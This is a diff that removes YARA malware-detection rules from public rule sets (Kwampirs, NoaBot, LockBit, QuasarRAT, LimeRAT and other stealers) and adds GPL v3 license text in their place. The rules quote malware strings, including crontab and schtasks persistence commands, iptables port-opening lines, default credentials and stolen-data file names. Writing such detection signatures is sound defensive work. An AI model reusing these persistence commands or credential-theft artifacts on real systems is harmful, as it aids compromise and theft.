"https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/apt_zz_orangeworm.yara#L85-L105" - license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" - logic_hash = "5ab949280be87d242ad2843dee001eee5a338e266ef52da55883f7c77e66cf5b" - score = 75 - quality = 85 - tags = "FILE" - yara_version = "3.7.0" - - strings: - $memcpy = { 56 8B F0 85 FF 74 19 85 D2 74 15 8B CF 85 F6 74 0B 2B D7 8A 04 0A 88 01 41 4E 75 F7 8B C7 5E C3 33 C0 5E C3 } - $strlenW = { 33 C0 85 C9 74 17 80 3C 41 00 75 07 80 7C 41 01 00 74 0A 3D 00 94 35 77 73 03 40 EB E9 C3 } - $strcmp = { 85 C0 75 07 85 D2 75 40 B0 01 C3 85 D2 74 39 66 83 38 00 56 74 24 0F B7 0A 66 85 C9 74 16 - 66 8B 30 83 C2 02 83 C0 02 66 3B F1 75 18 66 83 38 00 75 E4 EB 06 66 83 38 00 75 0A 66 83 3A 00 75 04 B0 - 01 5E C3 32 C0 5E C3 32 C0 C3 } - - condition: - ( uint16(0)==0x5a4d) and (1 of them ) -} -rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Installer : FILE -{ - meta: - description = "Kwampirs installer xor keys and Unicode string length routine" - author = "FBI / cywatch@fbi.gov" - id = "8c80d0d5-8c65-5cef-ad86-b38f4d671bec" - date = "2020-01-14" - modified = "2020-03-31" - reference = "https://assets.documentcloud.org/documents/6821582/FLASH-CP-000118-MW-Downgraded-Version.pdf" - source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/apt_zz_orangeworm.yara#L109-L127" - license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" - logic_hash = "ac9c3ba7188cbbe736ff81b41086fdc874ac24ae83d3cec390907f8edd0a0ce5" - score = 75 - quality = 85 - tags = "FILE" - yara_version = "3.7.0" - - strings: - $string_key = { 6C 35 E3 31 1B 23 F9 C9 65 EB F3 07 93 33 F2 A3 } - $resource_key = { 28 99 B6 17 63 33 EE 22 97 97 55 B5 7A C4 E1 A4 } - $strlenW = { 33 C0 85 C9 74 17 80 3C 41 00 75 07 80 7C 41 01 00 74 0A 3D 00 94 35 77 73 03 40 EB E9 C3} - - condition: - (( uint16(0)==0x5a4d) and (2 of them )) -} -rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Implant : FILE -{ - meta: - description = "Kwampirs implant xor and rsa keys" - author = "FBI / cywatch@fbi.gov" - id = "d1c1ab0e-e07d-5f0e-97e8-5aee53ab620e" - date = "2020-01-14" - modified = "2020-03-31" - reference = "https://assets.documentcloud.org/documents/6821582/FLASH-CP-000118-MW-Downgraded-Version.pdf" - source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/apt_zz_orangeworm.yara#L130-L177" - license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" - logic_hash = "a9559c17c802c6060799d0a1ee96d68bd521475dd12ff6040a74874cabe3a9a9" - score = 75 - quality = 85 - tags = "FILE" - yara_version = "3.7.0" - - strings: - $string_key = { 6C 35 E3 31 1B 23 F9 C9 65 EB F3 07 93 33 F2 A3 } - $beacon_key = { 28 30 A4 3F 6D 28 04 23 36 2A 32 DC AD 0B A0 4B E8 20 1F 64 84 0A F4 C4 C7 8A 8D C0 - A2 C4 40 19 A1 43 82 38 14 FD 6C 90 E0 7E 2A 40 DF D3 F2 3E 72 38 C4 96 4D 98 7C 16 3B 3C E7 27 B7 D0 EF - 7B 3C 45 06 9A 69 0D 6A 41 18 95 95 46 88 CC 19 6F EB 6B 5B F8 51 E4 2E E1 E6 8F 44 CF 20 2F 2B DE 7A 28 - 5D DB 55 5A 1A 35 AF D8 5F 57 B8 0F A5 F7 08 4A D0 AB E5 95 31 A1 25 31 00 65 3C 70 73 99 42 0A 02 1A 69 - D9 A6 DF 14 B2 05 DD A8 DF F5 D9 71 6D 6E 96 5F 1B D1 0F 8E 0A 35 D4 65 FA 90 58 CC 75 02 92 B7 2C 46 ED - 66 33 44 75 FC A4 E0 FD B8 C8 B5 0C 3A 84 D9 23 16 A4 AF 3B 57 C6 D2 5C B3 AB 9C CD F0 B2 A4 51 43 D3 F0 - 30 21 B5 ED 25 E3 64 B7 0C 1C A8 50 3A FF 6B 2C 32 06 B2 D1 54 3D 86 B9 1A BF 59 D7 92 59 EC 40 4A 8D B0 - E7 9A 9A 0D 94 19 27 D8 6D AD 5C 3E BE 14 67 DC F0 92 } - $download_key = { B7 E9 F9 2D F8 3E 18 57 B9 18 2B 1F 5F D9 A5 38 C8 E7 67 E9 C6 62 9C 50 4E 8D 00 - A6 59 F8 72 E0 91 42 FF 18 A6 D1 81 F2 2B C8 29 EB B9 87 6F 58 C2 C9 8E 75 3F 71 ED 07 D0 AC CE 28 A1 E7 - B5 68 CD CF F1 D8 2B 26 5C 31 1E BC 52 7C 23 6C 3E 6B 8A 24 61 0A 17 6C E2 BB 1D 11 3B 79 E0 29 75 02 D9 - 25 31 5F 95 E7 28 28 26 2B 31 EC 4D B3 49 D9 62 F0 3E D4 89 E4 CC F8 02 41 CC 25 15 6E 63 1B 10 3B 60 32 - 1C 0D 5B FA 52 DA 39 DF D1 42 1E 3E BD BC 17 A5 96 D9 43 73 3C 09 7F D2 C6 D4 29 83 3E 44 44 6C 97 85 9E - 7B F0 EE 32 C3 11 41 A3 6B A9 27 F4 A3 FB 2B 27 2B B6 A6 AF 6B 39 63 2D 91 75 AE 83 2E 1E F8 5F B5 65 ED - B3 40 EA 2A 36 2C A6 CF 8E 4A 4A 3E 10 6C 9D 28 49 66 35 83 30 E7 45 0E 05 ED 69 8D CF C5 40 50 B1 AA 13 - 74 33 0F DF 41 82 3B 1A 79 DC 3B 9D C3 BD EA B1 3E 04 33 } - $hashfile_key = { FE FE F5 5C 37 54 A1 6C 28 84 ED BF 84 70 25 41 56 24 37 32 98 9F A0 35 48 F3 1C 33 - 2E F9 D0 A3 7D 36 BA 66 ED FB 52 E3 8B 07 32 5A 1A DD 19 0A F0 73 A8 C6 61 3F 3F 31 8A 93 AB F4 19 AA D8 - 42 3B 3E 6E FC 0A 2A 41 1B 28 33 7F 79 27 41 81 14 D0 0B 24 06 4C 35 B3 23 5C F2 E4 06 7D 73 93 1C 7A 30 - 8E 87 74 0F 53 F9 92 A3 CA 20 E3 A1 12 E1 6B 86 62 B6 CC C1 45 C9 43 43 15 59 BE 5A 77 31 D8 36 5F BD F6 - D7 09 65 42 3C CD 2C B1 C1 28 55 6E F9 91 3C 55 3B DF EB ED BF 84 70 25 41 56 24 37 32 98 9F A0 35 48 F3 - 1C 33 2E F9 D0 A3 7D 36 BA 66 ED FB 52 E3 8B 07 32 5A 1A DD 19 0A F0 73 A8 C6 61 3F 3F 31 8A 93 AB F4 19 - AA D8 42 3B 3E 6E FC 0A 2A 41 1B 28 33 7F 79 27 41 81 14 D0 0B 24 06 4C 35 B3 23 5C F2 E4 06 7D 73 93 1C - 7A 30 8E 87 74 0F 53 F9 92 A3 CA 20 E3 A1 12 E1 6B 86 } - $rsa_key = { CD 74 15 BC 47 7E 0A 5E E4 35 22 A5 97 0C 65 BE E0 33 22 F2 94 9D F5 40 97 3C 53 F9 E4 7E - DD 67 CF 5F 0A 5E F4 AD C9 CF 27 D3 E6 31 48 B8 00 32 1D BE 87 10 89 DA 8B 2F 21 B4 5D 0A CD 43 D7 B4 - 75 C9 19 FE CC 88 4A 7B E9 1D 8C 11 56 A6 A7 21 D8 C6 82 94 C1 66 11 08 E6 99 2C 33 02 E2 3A 50 EA 58 D2 - A7 36 EE 5A D6 8F 5D 5D D2 9E 04 24 4A CE 4C B6 91 C0 7A C9 5C E7 5F 51 28 4C 72 E1 60 AB 76 73 30 66 18 - BE EC F3 99 5E 4B 4F 59 F5 56 AD 65 75 2B 8F 14 0C 0D 27 97 12 71 6B 49 08 84 61 1D 03 BA A5 42 92 F9 13 - 33 57 D9 59 B3 E4 05 F9 12 23 08 B3 50 9A DA 6E 79 02 36 EE CE 6D F3 7F 8B C9 BE 6A 7E BE 8F 85 B8 AA 82 - C6 1E 14 C6 1A 28 29 59 C2 22 71 44 52 05 E5 E6 FE 58 80 6E D4 95 2D 57 CB 99 34 61 E9 E9 B3 3D 90 DC 6C - 26 5D 70 B4 78 F9 5E C9 7D 59 10 61 DF F7 E4 0C B3 } +this License without regard to the additional permissions. - condition: - (( uint16(0)==0x5a4d) and (2 of them )) -} -rule CRAIU_Apt_ZZ_Orangeworm_Kwampirs_Shamoon : FILE -{ - meta: - description = "Kwampirs Shamoon overlap" - author = "FBI / cywatch@fbi.gov" - id = "87d28867-383e-5e09-8369-63c8a4e3f966" - date = "2020-01-14" - modified = "2020-03-31" - reference = "https://assets.documentcloud.org/documents/6821582/FLASH-CP-000118-MW-Downgraded-Version.pdf" - source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/apt_zz_orangeworm.yara#L200-L221" - license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" - logic_hash = "43f352c3db016d2831d11a13ae6c0baf440fa464560090e00432780df6a8982d" - score = 75 - quality = 60 - tags = "FILE" + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. - strings: - $s1 = "g\\system32\\" fullword wide - $s2 = "ztvttw" fullword wide - $s3 = "lwizvm" fullword ascii - $op1 = { 94 35 77 73 03 40 eb e9 } - $op2 = { 80 7c 41 01 00 74 0a 3d } - $op3 = { 74 0a 3d 00 94 35 77 } + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: - condition: - (( uint16(0)==0x5a4d) and ( filesize <4000KB) and (3 of them )) -} -rule CRAIU_Crashstrike : FILE -{ - meta: - description = "Crowdstrike C-00000???-*.sys files" - author = "Costin G. Raiu, Art of Noh, craiu@noh.ro" - id = "9a5168c4-0a7f-5269-bafa-728f123a04c5" - date = "2024-07-19" - modified = "2024-07-19" - reference = "https://en.wikipedia.org/wiki/July_2024_global_cyber_outages" - source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/20240719_crashstrike.yara#L2-L26" - license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" - hash = "9d001ef3206fe2f955095244e6103ad7f8f318c7c5cbd91a0dd1f33e4217fcb2" - logic_hash = "9a8dacf9d95042851073c40f5eab2a6aff61be3a576363ffcd8c21aaec7f0b96" - score = 75 - quality = 85 - tags = "FILE" - version = "1.0" + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or - strings: - $a1 = "000E0A000E0GHijklMNOPqRSTUVwX" - $a2 = "AbCDEfghIjklMNoPqrstuV" + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or - condition: - ( filesize <60KB) and ( uint32(0)==0xaaaaaaaa) and ( all of them ) -} -rule CRAIU_Crime_Noabot : FILE -{ - meta: - description = "Noabot is a clone of Mirai" - author = "Costin G. Raiu, Art of Noh, craiu@noh.ro" - id = "8626783b-898c-587d-9b23-c8c9111cde66" - date = "2024-01-11" - modified = "2024-01-11" - reference = "https://www.akamai.com/blog/security-research/mirai-based-noabot-crypto-mining" - source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/crime_noabot.yara#L2-L57" - license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" - hash = "1603202a9115b83224233697f2ca1d36fef60113b94a73a15afed79a459aacc3" - hash = "16a28951acfe78b81046bfedb0b489efb4c9d3d1d3b8475c39b93cd5105dc866" - hash = "3da983ef3580a4b1b3b041cd991019b900f7995791c0acb32035ac5706085a63" - hash = "648a4f33b2c268523378929179af529bc064538326a1202dcdfcd9ee12ae8f6c" - hash = "829b3c298f7003f49986fb26920f7972e52982651ae6127c6e8e219a86f46890" - hash = "c723a221cff37a700e0e3b9dc5f69cdd6a4cc82502ac7c144d6ca1eaf963e800" - hash = "c8d3c0b87176b7f8d5667d479cb40d1b9f030d30afe588826254f26ebb4ac58e" - logic_hash = "51c63f45f891ee80c5e8428575f12cb5881665cb9fe26018d173335db0f02012" - score = 75 - quality = 85 - tags = "FILE" - version = "1.1" + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or - strings: - $a1a = "(crontab -l; printf '@reboot %s noa" - $a1b = "(crontab -l; printf '@reboot %s \"%s\" noa" - $a2 = {40 6D 61 67 69 63 40 [1-8] 6E 6F 61 [1-8] 0A 0A 49 20 61 69 6E 74 20 79 6F 75 72 20 61 76} - $a3 = {31 32 33 34 35 36 [1-8] 41 64 6D 69 6E 21 40 23 [1-8] 7A 68 61 6E 67 6A 69 65 31 32 33 [1-8] 43 75 6D 75 6C 75 73 4C 69 6E 75 78 21 [1-8] 61 62 63 31 32 33 24 [1-8] 77 65 62 40 31 32 33 [1-8] 6D 70 69 75 73 65 72 [1-8] 61 74 75 61 6C 69 7A 61} - $a4 = "HACKED: %s:%d:%s:%s" - $a5 = {25 64 7C 25 64 00 31 76 57 3F 3E 55 00 26 25 2423 00 67 76 64 64 60 78 65 73 00 00 26 25 24 00} - $b1 = "ufw allow 24816" - $b2 = "iptables -I INPUT -p tcp --dport 24816 -j ACCEPT" - $b3 = "iptables -I OUTPUT -p tcp --dport 24816 -j ACCEPT" - $b4 = "firewall-cmd --permanent --add-port 24816/tcp" - $b5 = "magicPussyMommy" - $c1 = "SOCKET_CREATING_ERROR SCANNER" - $c2 = "SOCKET_CREATING_ERROR RECYCLE" + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or - condition: - filesize <10MB and ( uint32(0)==0x464c457f) and (( any of ($a*)) or ( all of ($b*)) or ( all of ($c*))) -} -rule CRAIU_Crime_Lockbit3_Ransomware : FILE -{ - meta: - description = "Generic LockBit detection, also catches the version used in attacks in Indonesia." - author = "Costin G. Raiu, TLPBLACK, craiu@noh.ro" - id = "167788a4-a610-5770-9f51-aa4cc4d3d350" - date = "2024-07-03" - modified = "2024-07-03" - reference = "https://www.bleepingcomputer.com/news/security/meet-brain-cipher-the-new-ransomware-behind-indonesia-data-center-attack/" - source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/crime_lockbit3_ransomware.yara#L2-L32" - license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" - hash = "eb82946fa0de261e92f8f60aa878c9fef9ebb34fdababa66995403b110118b12" - hash = "6e07da23603fbe5b26755df5b8fec19cadf1f7001b1558ea4f12e20271263417" - logic_hash = "84efb899315379d85a03959359f89fbcb97cbb6477f1ec439380a4d15fed4f53" - score = 75 - quality = 85 - tags = "FILE" - version = "1.1" + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or - strings: - $a1 = {C3 8BFF53 51 6A0158 0FA2F7C1000000400F95C0 84C074090FC7F0 0FC7F2 59 5B C3 } - $a2 = {C3 6A0758 33C90FA2F7C3000004000F95C0 84C074090FC7F8 0FC7FA 59 5B C3 } - $a3 = {C3 0F31 8BC8 C1C90D 0F31 8BD0 C1C20D 8BC1 59 5B C3 } - $a4 = {55 8BEC 51 52 56 33C0 8B550C 8B7508 AC 33C9 B930000000 8D0C4D01000000 02F1 2AF1 33C9 B906000000 8D0C4D01000000 D3CA 03D0 90 85C0} - $a5 = {E9 ?? ?? ?? ?? 6683F841 720C 6683F846 7706 6683E837 EB26 6683F861 720C 6683F866 7706 6683E857 EB14 6683F830 720C 6683F839 7706 6683E830 EB} - $a6 = {5D 8BC3 5F 5E 5B 5D C20C00 90 55 8BEC 53 56 57 33C0 8B5D14 33C9 33D2 8B750C 8B7D08 85F6 } + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. - condition: - ( filesize <1MB) and ( uint16(0)==0x5a4d) and (2 of them ) -} -rule CRAIU_Susp_Ios_Shutdown -{ - meta: - description = "Detect shutdown.log files from sysdiags with suspicious entries" - author = "Costin G. Raiu, Art of Noh, craiu@noh.ro" - id = "08aa1fb9-7af0-515a-91a8-09ed35e48155" - date = "2023-12-28" - modified = "2024-03-05" - reference = "https://securelist.com/shutdown-log-lightweight-ios-malware-detection-method/111734/" - source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/susp_ios_shutdown.yara#L2-L25" - license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE" - logic_hash = "936101f2dddb73f6dda41be47d775199c458aa4fecdcf348ed479da620343ea1" - score = 65 - quality = 85 - tags = "" - version = "1.0" - tlp = "TLP:CLEAR" + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. - strings: - $a1 = "these clients are still here:" - $b1 = "/private/var/db/" - $b2 = "/private/var/tmp/" - $c1 = "After " + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. - condition: - ($c1 at 0) and $a1 and ( any of ($b*)) -} -/* - * YARA Rule Set - * Repository Name: DitekSHen - * Repository: https://github.com/ditekshen/detection - * Retrieval Date: 2024-09-08 - * Git Commit: 5784a5704477b877fb6e2102b49b73a43f350cca - * Number of Rules: 1427 - * Skipped: 0 (age), 112 (quality), 0 (score), 0 (importance) - * - * - * LICENSE - * - * Copyright 2021 by ditekSHen (https://github.com/ditekshen/detection). + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. -The 2-Clause BSD License + 8. Termination. -Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: -1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. -2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). - */ -import "pe" + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. -rule DITEKSHEN_MALWARE_Win_Laturo : FILE -{ - meta: - description = "Laturo information stealer payload" - author = "ditekSHen" - id = "221a1ee8-e1ae-558c-919c-e3f55c1500f0" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L3-L26" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "bfb0c5676c926f58a4395a56dad09b37e8ac1cf0bf6b5521767c16698644b73a" - score = 75 - quality = 61 - tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.Laturo" + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. - strings: - $str1 = "cmd.exe /c ping 127.0.0.1" ascii wide - $str2 = "cmd.exe /c start" ascii wide - $str3 = "\\RapidLoader\\" ascii - $str4 = "loader/gate.php" ascii wide - $str5 = "Hwid:" ascii wide - $str6 = "Special:" ascii wide - $str7 = "logs=%s" ascii - $data1 = "cookies.%u.txt" nocase ascii wide - $data2 = "passwords.%u.txt" nocase ascii wide - $data3 = "credentials.%u.txt" nocase ascii wide - $data4 = "cards.%u.txt" nocase ascii wide - $data5 = "autofill.%u.txt" nocase ascii wide - $data6 = "loginusers.vdf" ascii wide - $data7 = "screenshot.bmp" nocase ascii wide - $data8 = "webcam.bmp" nocase ascii wide + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. - condition: - uint16(0)==0x5a4d and 5 of ($str*) and 1 of ($data*) -} -import "pe" + 9. Acceptance Not Required for Having Copies. -rule DITEKSHEN_MALWARE_Win_Xpertrat : FILE -{ - meta: - description = "XpertRAT payload" - author = "ditekSHen" - id = "cea7de47-b47c-5fea-96ee-5858b16cca8d" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L28-L56" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "2a521bd1d6ce16fa16aa7757db2657dcab15e6802454ad899906d4ed17401feb" - score = 75 - quality = 63 - tags = "FILE" - snort_sid = "920003-920006" - clamav_sig = "MALWARE.Win.Trojan.XpertRAT" + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. - strings: - $v1 = "[XpertRAT-Mutex]" fullword wide - $v2 = "XPERTPLUGIN" fullword wide - $v3 = "+Xpert+3." wide - $v4 = "keylog.tmp" fullword wide - $v5 = "\\TempReg.reg" fullword wide - $s1 = "ClsKeylogger" fullword ascii nocase - $s2 = "clsCamShot" fullword ascii nocase - $s3 = "ClsShellCommand" fullword ascii nocase - $s4 = "ClsRemoteDesktop" fullword ascii nocase - $s5 = "ClsScreenRemote" fullword ascii nocase - $s6 = "ClsSoundRemote" fullword ascii nocase - $s7 = "MdlHidder" fullword ascii - $s8 = "modKeylog" fullword ascii - $s9 = "modWipe" fullword ascii - $s10 = "modDelProcInUse" fullword ascii - $s11 = "Socket_DataArrival" fullword ascii - $s12 = "cZip_EndCompress" fullword ascii + 10. Automatic Licensing of Downstream Recipients. - condition: - uint16(0)==0x5a4d and (3 of ($v*) or 6 of ($s*)) -} -import "pe" + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. -rule DITEKSHEN_MALWARE_Win_Isrstealer : FILE -{ - meta: - description = "ISRStealer payload" - author = "ditekSHen" - id = "d6c3acdd-e881-5f97-8856-b7b60f56a1c2" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L112-L128" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "5dd030ab8122b5dd432168647c7a3465cb3593a326f68b4863a91d16587641e5" - score = 75 - quality = 75 - tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.ISRStealer" + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. - strings: - $s1 = "&password=" wide - $s2 = "&pcname=" wide - $s3 = "MSVBVM60.DLL" ascii - $s4 = "MSVBVM60.DLL" wide - $s5 = "Core Software For : Public" wide - $s6 = "</Host>" wide - $s7 = "</Pass>" wide - $s8 = "/scomma" wide + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. - condition: - ( uint16(0)==0x5a4d and filesize <4000KB and 6 of them ) or all of them -} -import "pe" + 11. Patents. -rule DITEKSHEN_MALWARE_Win_Quasarrat : FILE -{ - meta: - description = "QuasarRAT payload" - author = "ditekSHen" - id = "f256b88f-eee6-5f8c-afd6-32ed10ea908d" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L130-L150" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "556b19dc0980761198ea31a285f281adae084463d24bff1eda15326436ad562b" - score = 75 - quality = 75 - tags = "FILE" + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". - strings: - $s1 = "GetKeyloggerLogsResponse" fullword ascii - $s2 = "GetKeyloggerLogs" fullword ascii - $s3 = "/>Log created on" wide - $s4 = "User: {0}{3}Pass: {1}{3}Host: {2}" wide - $s5 = "Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7}" wide - $s6 = "grabber_" wide - $s7 = "<virtualKeyCode>" ascii - $s8 = "<RunHidden>k__BackingField" fullword ascii - $s9 = "<keyboardHookStruct>" ascii - $s10 = "add_OnHotKeysDown" ascii - $mutex = "QSR_MUTEX_" ascii wide - $ua1 = "Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0" fullword wide - $us2 = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A" fullword wide + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. - condition: - uint16(0)==0x5a4d and ($mutex or ( all of ($ua*) and 2 of them ) or 6 of ($s*)) -} -import "pe" + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. -rule DITEKSHEN_MALWARE_Win_Limerat : FILE -{ - meta: - description = "LimeRAT payload" - author = "ditekSHen" - id = "a4b85cad-97a8-514c-9380-f3e8ec95a44d" - date = "2024-09-06" - modified = "2024-09-06" - reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L152-L168" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "8ae35c5fa48773b93da0b76b238fc8dbaf19fdeb6fd81bf23842c5121d620116" - score = 75 - quality = 75 - tags = "FILE" + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. - strings: - $s1 = "schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr" wide - $s2 = "\\vboxhook.dll" fullword wide - $s3 = "Win32_Processor.deviceid=\"CPU0\"" fullword wide - $s4 = "select CommandLine from Win32_Process where Name='{0}'" wide - $s5 = "Minning..." fullword wide - $s6 = "Regasm.exe" fullword wide - $s7 = "Flood!" fullword wide - $s8 = "Rans-Status" fullword wide - $s9 = "cmd.exe /c ping 0" wide + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) 